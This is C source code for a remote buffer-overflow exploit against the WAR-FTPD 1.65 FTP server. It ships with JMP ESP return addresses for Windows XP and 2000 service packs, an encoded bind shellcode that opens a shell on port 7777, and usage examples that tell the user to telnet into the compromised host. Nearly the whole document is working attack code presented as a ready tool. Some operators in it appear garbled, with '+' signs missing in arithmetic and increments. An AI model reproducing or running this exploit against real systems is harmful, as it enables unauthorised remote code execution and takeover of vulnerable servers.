#include <stdio.h>
#include <string.h>
#include <winsock.h>
#define VULNSERVER "WAR-FTPD 1.65"
#define VULNCMD "\\x55\\x53\\x45\\x52\\x20"
#define ZERO \’\\x00\’
#define NOP \’\\x90\’
#define VULNBUFF 485
#define BUFFREAD 128
#define PORT 21
#define LENJMPESP 4
/* #############################################################################
##### #####
##### WARFTP – VERSION 1.65 #####
##### #####
##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability #####
##### #####
##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow #####
##### vulnerability because it fails to properly check boundaries #####
##### on user-supplied data before copying it to an insufficiently #####
##### sized buffer. #####
##### #####
##### FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv) #####
##### 0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer) #####
##### #####
##### AFFECTED VERSION: 1.65 #####
##### USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ] #####
##### SO_&_SERVICE_PACK: #####
##### [0] Microsoft Windows XP Pro Spanish SP0 #####
##### [1] Microsoft Windows XP Pro Spanish SP1 #####
##### [2] Microsoft Windows XP Pro Spanish SP2 #####
##### [3] Microsoft Windows XP Pro English SP0 #####
##### [4] Microsoft Windows XP Pro English SP1 #####
##### [5] Microsoft Windows XP Pro English SP2 #####
##### [6] Microsoft Windows 2000 Pro Spanish SP0 #####
##### [7] Microsoft Windows 2000 Pro Spanish SP1 #####
##### [8] Microsoft Windows 2000 Pro Spanish SP2 #####
##### [9] Microsoft Windows 2000 Pro Spanish SP3 #####
##### [10] Microsoft Windows 2000 Pro English SP0 #####
##### [11] Microsoft Windows 2000 Pro English SP1 #####
##### [12] Microsoft Windows 2000 Pro English SP2 #####
##### [13] Microsoft Windows 2000 Pro English SP3 #####
##### [14] Custom -> JMP ESP ADDRESS #####
##### #####
##### EXAMPLE: warftphack.exe 127.0.0.1 2 #####
##### EXAMPLE2: warftphack.exe 127.0.0.1 14 0x776EDDFF #####
##### #####
##### AUTOR: niXel – SYSCODE (SPAIN) #####
##### IDE: Dev-C ver-4.9.9.2 #####
##### COMPILER: MinGW #####
##### DEPENDENCES: Linker -> libwsock32.a #####
##### MAIL: Und3rground2002@hotmail.com #####
##### #####
#############################################################################
CAUTION: USER command vulnerable => no send \\x40 (@) char into shellcode (user@host)
no send \\x0A (\\n) char into shellcode
no send \\x0D (\\r) char into shellcode
FUNCTION sprintf => no send \\x00 (\\0) char into shellcode
############################ BINDSHELLCODE ##############################
[7777] */
char syscode[] =
"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49"
"\\x49\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x61"
"\\x58\\x30\\x42\\x31\\x50\\x42\\x41\\x6b\\x41\\x41\\x71\\x32\\x41\\x42\\x41\\x32"
"\\x42\\x41\\x30\\x42\\x41\\x58\\x38\\x41\\x42\\x50\\x75\\x6d\\x39\\x4b\\x4c\\x32"
"\\x4a\\x5a\\x4b\\x50\\x4d\\x6d\\x38\\x6b\\x49\\x49\\x6f\\x59\\x6f\\x39\\x6f\\x35"
"\\x30\\x6c\\x4b\\x70\\x6c\\x65\\x74\\x37\\x54\\x4c\\x4b\\x42\\x65\\x47\\x4c\\x6e"
"\\x6b\\x31\\x6c\\x46\\x65\\x33\\x48\\x43\\x31\\x48\\x6f\\x6c\\x4b\\x70\\x4f\\x65"
"\\x48\\x6c\\x4b\\x73\\x6f\\x35\\x70\\x37\\x71\\x38\\x6b\\x31\\x59\\x4c\\x4b\\x46"
"\\x54\\x6e\\x6b\\x53\\x31\\x58\\x6e\\x30\\x31\\x6f\\x30\\x4f\\x69\\x4e\\x4c\\x4b"
"\\x34\\x49\\x50\\x41\\x64\\x46\\x67\\x49\\x51\\x7a\\x6a\\x46\\x6d\\x43\\x31\\x48"
"\\x42\\x5a\\x4b\\x38\\x74\\x47\\x4b\\x30\\x54\\x64\\x64\\x51\\x38\\x42\\x55\\x4b"
"\\x55\\x4e\\x6b\\x53\\x6f\\x51\\x34\\x43\\x31\\x4a\\x4b\\x50\\x66\\x4e\\x6b\\x46"
"\\x6c\\x42\\x6b\\x4c\\x4b\\x73\\x6f\\x75\\x4c\\x33\\x31\\x5a\\x4b\\x65\\x53\\x34"
"\\x6c\\x6e\\x6b\\x6d\\x59\\x30\\x6c\\x57\\x54\\x55\\x4c\\x55\\x31\\x4b\\x73\\x74"
"\\x71\\x69\\x4b\\x65\\x34\\x6e\\x6b\\x43\\x73\\x74\\x70\\x6c\\x4b\\x67\\x30\\x46"
"\\x6c\\x6c\\x4b\\x70\\x70\\x67\\x6c\\x6e\\x4d\\x6c\\x4b\\x57\\x30\\x44\\x48\\x71"
"\\x4e\\x72\\x48\\x4e\\x6e\\x50\\x4e\\x54\\x4e\\x38\\x6c\\x70\\x50\\x4b\\x4f\\x4e"
"\\x36\\x71\\x76\\x41\\x43\\x31\\x76\\x31\\x78\\x76\\x53\\x30\\x32\\x53\\x58\\x30"
"\\x77\\x44\\x33\\x57\\x42\\x63\\x6f\\x70\\x54\\x6b\\x4f\\x48\\x50\\x73\\x58\\x58"
"\\x4b\\x58\\x6d\\x6b\\x4c\\x57\\x4b\\x70\\x50\\x6b\\x4f\\x6a\\x76\\x71\\x4f\\x6d"
"\\x59\\x4b\\x55\\x65\\x36\\x6c\\x41\\x68\\x6d\\x53\\x38\\x63\\x32\\x42\\x75\\x51"
"\\x7a\\x36\\x62\\x59\\x6f\\x58\\x50\\x71\\x78\\x4a\\x79\\x34\\x49\\x4b\\x45\\x6e"
"\\x4d\\x30\\x57\\x69\\x6f\\x4e\\x36\\x52\\x73\\x41\\x43\\x62\\x73\\x76\\x33\\x51"
"\\x43\\x70\\x43\\x43\\x63\\x73\\x73\\x36\\x33\\x6b\\x4f\\x4a\\x70\\x75\\x36\\x41"
"\\x78\\x75\\x4e\\x71\\x71\\x35\\x36\\x42\\x73\\x4b\\x39\\x79\\x71\\x6c\\x55\\x70"
"\\x68\\x4f\\x54\\x75\\x4a\\x32\\x50\\x39\\x57\\x52\\x77\\x69\\x6f\\x38\\x56\\x70"
"\\x6a\\x72\\x30\\x50\\x51\\x53\\x65\\x4b\\x4f\\x58\\x50\\x55\\x38\\x6c\\x64\\x4c"
"\\x6d\\x34\\x6e\\x49\\x79\\x66\\x37\\x6b\\x4f\\x4e\\x36\\x50\\x53\\x30\\x55\\x69"
"\\x6f\\x4a\\x70\\x53\\x58\\x7a\\x45\\x41\\x59\\x4e\\x66\\x37\\x39\\x36\\x37\\x69"
"\\x6f\\x59\\x46\\x72\\x70\\x50\\x54\\x31\\x44\\x33\\x65\\x4b\\x4f\\x5a\\x70\\x4f"
"\\x63\\x51\\x78\\x38\\x67\\x50\\x79\\x38\\x46\\x43\\x49\\x32\\x77\\x4b\\x4f\\x4b"
"\\x66\\x62\\x75\\x79\\x6f\\x6a\\x70\\x45\\x36\\x30\\x6a\\x52\\x44\\x30\\x66\\x41"
"\\x78\\x32\\x43\\x72\\x4d\\x6f\\x79\\x6d\\x35\\x62\\x4a\\x42\\x70\\x70\\x59\\x74"
"\\x69\\x5a\\x6c\\x6c\\x49\\x6b\\x57\\x41\\x7a\\x32\\x64\\x6b\\x39\\x68\\x62\\x30"
"\\x31\\x6f\\x30\\x6b\\x43\\x6e\\x4a\\x6b\\x4e\\x51\\x52\\x34\\x6d\\x49\\x6e\\x62"
"\\x62\\x36\\x4c\\x5a\\x33\\x6c\\x4d\\x71\\x6a\\x65\\x68\\x6e\\x4b\\x4c\\x6b\\x4e"
"\\x4b\\x55\\x38\\x30\\x72\\x59\\x6e\\x4c\\x73\\x37\\x66\\x4b\\x4f\\x30\\x75\\x63"
"\\x74\\x39\\x6f\\x6e\\x36\\x33\\x6b\\x36\\x37\\x72\\x72\\x31\\x41\\x31\\x41\\x46"
"\\x31\\x50\\x6a\\x55\\x51\\x31\\x41\\x41\\x41\\x32\\x75\\x42\\x71\\x39\\x6f\\x48"
"\\x50\\x50\\x68\\x6c\\x6d\\x39\\x49\\x45\\x55\\x78\\x4e\\x30\\x53\\x39\\x6f\\x6b"
"\\x66\\x62\\x4a\\x79\\x6f\\x39\\x6f\\x47\\x47\\x39\\x6f\\x58\\x50\\x4e\\x6b\\x50"
"\\x57\\x4b\\x4c\\x6c\\x43\\x4b\\x74\\x70\\x64\\x6b\\x4f\\x6a\\x76\\x41\\x42\\x49"
"\\x6f\\x58\\x50\\x30\\x68\\x68\\x6f\\x6a\\x6e\\x4b\\x50\\x31\\x70\\x42\\x73\\x49"
"\\x6f\\x58\\x56\\x49\\x6f\\x78\\x50\\x61";
int main(int argc, char ** argv) {
char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;
char * pbuffSend;
unsigned int err = 0, i, k;
int sockData, j;
struct sockaddr_in their_addr;
WSADATA wsaData;
system("cls");
fprintf(stdout, "\\n\\tWarFTP Username Stack-Based Buffer-Overflow Vulnerability\\n");
fprintf(stdout, " ____________________________________________________________________\\n\\n");
if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) || ((argc == 4) && (atoi(argv[2]) == 14))) {
if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {
if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
/* Server data struct */
their_addr.sin_family = AF_INET; // ; Family AF_INET
their_addr.sin_addr.s_addr = inet_addr(argv[1]); // ; IP Address = Argv[1]
their_addr.sin_port = htons(PORT); // ; Port = 21
memset(&(their_addr.sin_zero), \’0\’, 8); // ; IP:Port = Argv[1]:21
if (connect(sockData, (struct sockaddr *) &their_addr, sizeof(struct sockaddr)) != -1) {
recv(sockData, buffRead, BUFFREAD, 0);
buffRead[BUFFREAD – 1] = ZERO;
if (strstr(buffRead, VULNSERVER) != NULL) {
/* #################################################################################
##### BufferSend -> "USER A*VULNBUFF @JMP_ESP \\x90\\x90\\x90\\x90 SYSCODE \\r\\n #####
################################################################################# */
pbuffSend = (char *) malloc(strlen(VULNCMD) VULNBUFF LENJMPESP (sizeof(char) * 4) strlen(syscode) (sizeof(char) * 2));
if (pbuffSend != NULL) {
for (i=0; i < strlen(VULNCMD); i ) *(pbuffSend i) = VULNCMD;
for (j=0; j < VULNBUFF; i , j ) *(pbuffSend i) = \’\\x41\’;
/* – OPcodes from ntdll.dll -> JMP ESP – */
switch(atoi(argv[2])) {
case 0: memcpy(jmpESP, "\\xE3\\x39\\xF4\\x77", LENJMPESP); break;
case 1: memcpy(jmpESP, "\\x0F\\x98\\xF8\\x77", LENJMPESP); break;
case 2: memcpy(jmpESP, "\\xED\\x1E\\x95\\x7C", LENJMPESP); break;
case 3: memcpy(jmpESP, "\\xE3\\x39\\xF4\\x77", LENJMPESP); break;
case 4: memcpy(jmpESP, "\\xCC\\x59\\xFA\\x77", LENJMPESP); break;
case 5: memcpy(jmpESP, "\\xED\\x1E\\x95\\x7C", LENJMPESP); break;
case 6: memcpy(jmpESP, "\\xFF\\xFF\\xFF\\xFF", LENJMPESP); break;
case 7: memcpy(jmpESP, "\\xFF\\xFF\\xFF\\xFF", LENJMPESP); break;
case 8: memcpy(jmpESP, "\\xFF\\xFF\\xFF\\xFF", LENJMPESP); break;
case 9: memcpy(jmpESP, "\\xFF\\xFF\\xFF\\xFF", LENJMPESP); break;
case 10: memcpy(jmpESP, "\\x8B\\x94\\xF8\\x77", LENJMPESP); break;
case 11: memcpy(jmpESP, "\\xAB\\x67\\xF9\\x77", LENJMPESP); break;
case 12: memcpy(jmpESP, "\\xFF\\xFF\\xFF\\xFF", LENJMPESP); break;
case 13: memcpy(jmpESP, "\\xFF\\xFF\\xFF\\xFF", LENJMPESP); break;
case 14:
k = 0;
if ((strncmp(argv[3], "0x", (sizeof(char) * 2)) == 0) && (strlen(argv[3]) == 10)) {
for (j=(sizeof(char) * 8) – 1; ((j >= 0) && (!err)); j–) {
ch = *(argv[3] j 2);
if (((ch > 47) && (ch < 58)) || ((ch > 64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {
if ((ch > 47) && (ch < 58)) ch -= 48;
else if ((ch > 64) && (ch < 71)) ch -= 55;
else ch -= 87;
if ((j % 2) == 0) jmpESP[k ] = ((ch <<= 4) | ch2);
else ch2 = ch;
}
else { fprintf(stderr, "\\t[ ERROR ] Three parameter syntax error\\n\\t[ ERROR ] Example: 0xFFFFFFFF\\n"); err = 1; }
}
}
else { fprintf(stderr, "\\t[ ERROR ] Three parameter syntax error\\n\\t[ ERROR ] Example: 0xFFFFFFFF\\n"); err = 1; }
}
if (!err) {
for (j=0; j < LENJMPESP; i , j ) *(pbuffSend i) = jmpESP[j];
for (j=0; j < (sizeof(char) * 4); i , j ) *(pbuffSend i) = NOP;
for (j=0; j < strlen(syscode); i , j ) *(pbuffSend i) = syscode[j];
memcpy(pbuffSend i, "\\r\\n", (sizeof(char) * 2));
if (i == send(sockData, pbuffSend, i, 0)) {
fprintf(stdout, "\\t[ OK ] Exploit buffer send to %s:%d\\n", argv[1], PORT);
fprintf(stdout, "\\t[ OK ] If you have not chosen a correct operating system and\\n\\t service pack you can cause a D.O.S\\n");
fprintf(stdout, "\\t[ OK ] Connect: telnet %s 7777\\n", argv[1]);
}
else fprintf(stderr, "\\t[ ERROR ] No sending all exploit buffer\\n");
}
free(pbuffSend);
}
else fprintf(stderr, "\\t[ ERROR ] No allocate memory\\n");
}
else fprintf(stderr, "\\t[ ERROR ] Not a vulnerable server\\n");
}
else fprintf(stderr, "\\t[ ERROR ] Connect to %s:%d\\n", argv[1], PORT);
closesocket(sockData);
}
else fprintf(stderr, "\\t[ ERROR ] Create local socket\\n");
WSACleanup();
}
else fprintf(stderr, "\\t[ ERROR ] Load library");
}
else {
fprintf(stderr, " [ ] USE: %s IP_ADDRESS SERVICE_PACK [ ESP_ADDRESS ]\\n\\n", argv[0]);
fprintf(stderr, " [ ] SERVICE PACK: [ – ] Microsoft Windows XP Pro Spanish SP0 (0)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows XP Pro Spanish SP1 (1)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows XP Pro Spanish SP2 (2)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows XP Pro English SP0 (3)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows XP Pro English SP1 (4)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows XP Pro English SP2 (5)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows 2000 Pro Spanish SP0 (6)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows 2000 Pro Spanish SP1 (7)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows 2000 Pro Spanish SP2 (8)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows 2000 Pro Spanish SP3 (9)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows 2000 Pro English SP0 (10)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows 2000 Pro English SP1 (11)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows 2000 Pro English SP2 (12)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Microsoft Windows 2000 Pro English SP3 (13)\\n");
fprintf(stderr, "\\t\\t\\t[ – ] Custom Service Pack – JMP %%ESP (14)\\n\\n");
fprintf(stderr, " [ ] EXAMPLE: %s 127.0.0.1 2\\n", argv[0]);
fprintf(stderr, " [ ] EXAMPLE2: %s 127.0.0.1 14 0x776EDDFF\\n", argv[0]);
}
fprintf(stdout, " ___________________________________________________________________\\n\\n");
return 0;
}